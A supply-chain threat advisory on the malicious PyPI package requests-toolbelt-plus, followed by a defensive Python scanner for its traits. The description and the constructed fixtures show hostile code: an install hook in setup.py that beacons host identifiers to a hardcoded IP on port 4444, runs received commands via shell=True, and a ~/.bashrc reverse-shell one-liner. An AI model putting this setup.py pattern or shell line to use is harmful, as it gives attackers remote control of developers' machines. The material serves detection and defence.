THREATPKG

Supply-chain threat intelligence


critical · pypi · credential theft · osv

Malicious code in requests-toolbelt-plus (PyPI)

requests-toolbelt-plus

Risk score

92

AI summary

Indexed incident for requests-toolbelt-plus (pypi).

Description

The package impersonates the popular requests-toolbelt library but ships an empty requests_toolbelt_plus/__init__.py and places its real logic in setup.py.

On pip install, setup.py checks /proc/version for WSL markers and, when matched, opens a TCP socket to the hardcoded IP 185.184.192.205 on port 4444, sends a JSON beacon containing os.getlogin(), os.uname().nodename, and os.getcwd(), then spawns a background thread that reads JSON commands from the socket and executes them via subprocess.run(cmd, shell=True, capture_output=True, text=True), returning stdout/stderr to the operator: full remote command execution against the installer's machine.

setup.py also appends a Python one-liner to ~/.bashrc that re-opens the same socket, dup2s stdio onto it, and execs /bin/bash -i, giving the attacker a persistent interactive reverse shell that fires on every new interactive shell (bash sources ~/.bashrc for interactive shells, and most login profiles source it in turn) and survives package uninstall.

The WSL-only gating is a deliberate evasion: the code stays dormant on non-WSL maintainer machines and sandboxes and executes only on targeted Windows-Subsystem-for-Linux developer hosts.

Installing the package on a WSL host exfiltrates basic host identifiers and hands the operator remote command execution plus a persistent reverse shell; importing the module does nothing, since the package body is empty, and the package has no legitimate purpose.
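As an added triage example (not code from ThreatPkg or from the package itself), the following Python statically checks an unpacked sdist for the traits described above: the hardcoded C2 endpoint, /proc/version gating, host fingerprinting calls, shell=True command execution, an install-command hook, and a write to ~/.bashrc, and it flags the empty-package/logic-in-setup.py layout. A second function scans a shell rc file for the reverse-shell one-liner so the persistence can be found after the package is uninstalled. The fixture sdist and .bashrc are constructed here from the description and are only parsed, never executed; the tag names, risk threshold and regular expression are my own assumptions.

```python
import ast
import re

# Indicators from the incident description on this page; tag names are my own.
C2_IP = "185.184.192.205"
C2_PORT = 4444
# Shape of the persistence one-liner: `python -c` that opens a socket, dup2()s stdio onto it, execs a shell.
BASHRC_SHELL_RE = re.compile(r"python\S*\s+-c\s+.*socket.*dup2.*/bin/(ba)?sh", re.I)
STRING_TAGS = {C2_IP: "c2-ip", "/proc/version": "wsl-gating", ".bashrc": "bashrc-persistence"}
CALL_TAGS = {"os.getlogin": "host-fingerprint", "os.uname": "host-fingerprint", "os.getcwd": "host-fingerprint",
             "socket.socket": "raw-socket", "socket.create_connection": "raw-socket", "os.system": "shell-exec"}
EXEC_CALLS = {"subprocess.run", "subprocess.Popen", "subprocess.call", "subprocess.check_output"}

def _dotted(node):
    # 'a.b.c' for an Attribute/Name chain, '' for anything else (e.g. a call result).
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""

class _SetupVisitor(ast.NodeVisitor):
    def __init__(self):
        self.findings = set()

    def visit_Constant(self, node):
        v = node.value
        if isinstance(v, str):
            self.findings.update(tag for needle, tag in STRING_TAGS.items() if needle in v)
        elif type(v) is int and v == C2_PORT:  # `is int` keeps True/False out
            self.findings.add("c2-port")

    def visit_ClassDef(self, node):
        # `class Hook(install):` is how a setup.py takes over `pip install`.
        if any(_dotted(b).split(".")[-1] == "install" for b in node.bases):
            self.findings.add("install-hook")
        self.generic_visit(node)

    def visit_Call(self, node):
        name = _dotted(node.func)
        kw = {k.arg: k.value for k in node.keywords}
        if name in CALL_TAGS:
            self.findings.add(CALL_TAGS[name])
        if name in EXEC_CALLS and isinstance(kw.get("shell"), ast.Constant) and kw["shell"].value is True:
            self.findings.add("shell-exec")
        if "cmdclass" in kw:  # setup(..., cmdclass={"install": ...})
            self.findings.add("install-hook")
        self.generic_visit(node)

def scan_setup_py(source):
    """Tags for suspicious constructs in a setup.py; an empty set means nothing matched."""
    v = _SetupVisitor()
    v.visit(ast.parse(source))
    return v.findings

def scan_sdist(files):
    """files: {path: text} of an unpacked sdist. Also flags a no-op package whose logic lives in setup.py."""
    findings = scan_setup_py(files.get("setup.py", ""))
    inits = [t for p, t in files.items() if p.endswith("__init__.py")]
    empty_package = bool(inits) and all(not t.strip() for t in inits)
    return {"setup_py": findings,
            "logic_only_in_setup": empty_package and bool(findings),
            "risk": "high" if findings & {"c2-ip", "shell-exec", "bashrc-persistence"} else "low"}

def find_bashrc_persistence(text):
    """(line_no, line) for rc-file lines matching the reverse-shell hook or naming the C2 IP."""
    return [(n, line.strip()) for n, line in enumerate(text.splitlines(), 1)
            if BASHRC_SHELL_RE.search(line) or C2_IP in line]

# Constructed fixtures mirroring the description above; they are parsed only, never executed.
SAMPLE_SDIST = {
    "requests_toolbelt_plus/__init__.py": "",
    "setup.py": '''
import json, os, socket, subprocess
from setuptools import setup
from setuptools.command.install import install
def _beacon():
    if "microsoft" not in open("/proc/version").read().lower():
        return
    s = socket.socket()
    s.connect(("185.184.192.205", 4444))
    s.sendall(json.dumps({"u": os.getlogin(), "h": os.uname().nodename, "d": os.getcwd()}).encode())
    subprocess.run(json.loads(s.recv(4096))["cmd"], shell=True, capture_output=True, text=True)
    with open(os.path.expanduser("~/.bashrc"), "a") as rc:
        rc.write("python3 -c '...'\\n")
class Hook(install):
    def run(self): _beacon(); install.run(self)
setup(name="requests-toolbelt-plus", version="99.9.9", cmdclass={"install": Hook})
''',
}
SAMPLE_BASHRC = """# constructed ~/.bashrc fixture; the one-liner is elided with "..."
export PATH="$HOME/.local/bin:$PATH"
alias ll='ls -la'
python3 -c 'import socket,os;s=socket.socket();s.connect(("185.184.192.205",4444));os.dup2(s.fileno(),0);...;os.execv("/bin/bash",["bash","-i"])'
"""
```

Run scan_sdist on the files of a downloaded sdist before installing it, and find_bashrc_persistence on ~/.bashrc (and ~/.profile) of any WSL host that already installed one of the affected versions; uninstalling the package does not remove the rc-file hook. The AST walk deliberately ignores variable names and string concatenation, so it catches the literal constructs the description lists but not an obfuscated variant; treat an empty result as "nothing obvious", not as clean.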


Category: PROBABLY_PENTEST - Packages that look like typical pentest packages, plus anything that looks like testing, exploration of pre-prepared kits, research and the like, with clearly low-harm potential.

Campaign: GENERIC-standard-pypi-install-pentest

Reasons (campaign template; note that these understate the behaviour in the Description above, which documents remote command execution and a persistent reverse shell rather than a limited-risk beacon):

  • The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.

  • The package overrides the install command in setup.py to execute malicious code during installation.

Technical details

Affected versions

  • = 99.9.9
  • = 99.9.10
  • = 100.0.0
  • = 2026.6.10.172624

Indicators

  • affected version = 99.9.9 (75%)
  • affected version = 99.9.10 (75%)
  • affected version = 100.0.0 (75%)
  • affected version = 2026.6.10.172624 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg
